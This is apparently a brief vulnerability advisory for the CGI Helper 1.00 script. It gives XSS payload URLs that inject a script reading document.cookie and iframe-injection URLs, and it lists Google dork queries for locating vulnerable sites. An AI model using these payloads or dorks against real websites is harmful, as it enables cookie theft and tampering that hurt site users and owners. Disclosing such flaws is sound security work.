## CGI Helper 1.00 ##

## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##

## Discovered by: Paulo Santos ##

## Contact: paulo@infocampoap.com.br ##

## Blog: http://infocampo.wordpress.com ##

The script CGI Helper 1.00 is vulnerable to XSS.

Example:

www.site.com/cgi-bin/helper.cgi

XSS:

www.site.com/cgi-bin/helper.cgi/>’><script>alert(document.cookie)</script>

or

Example:

http://www.site.com/cgi-bin/cgihelper.pl

XSS:

http://www.site.com/cgi-bin/cgihelper.pl/>’><script>alert(document.cookie)</script>


The script makes infinite iframes that can affect the user:

http://www.site.com/cgi-bin/helper.cgi/>’><iframe src=http://www.google.com.br>

or

http://www.site.com/cgi-bin/cgihelper.pl/>’><iframe src=http://www.google.com.br>

Google dork:

inurl:cgihelper.pl

inurl:cgi-bin/helper.cgi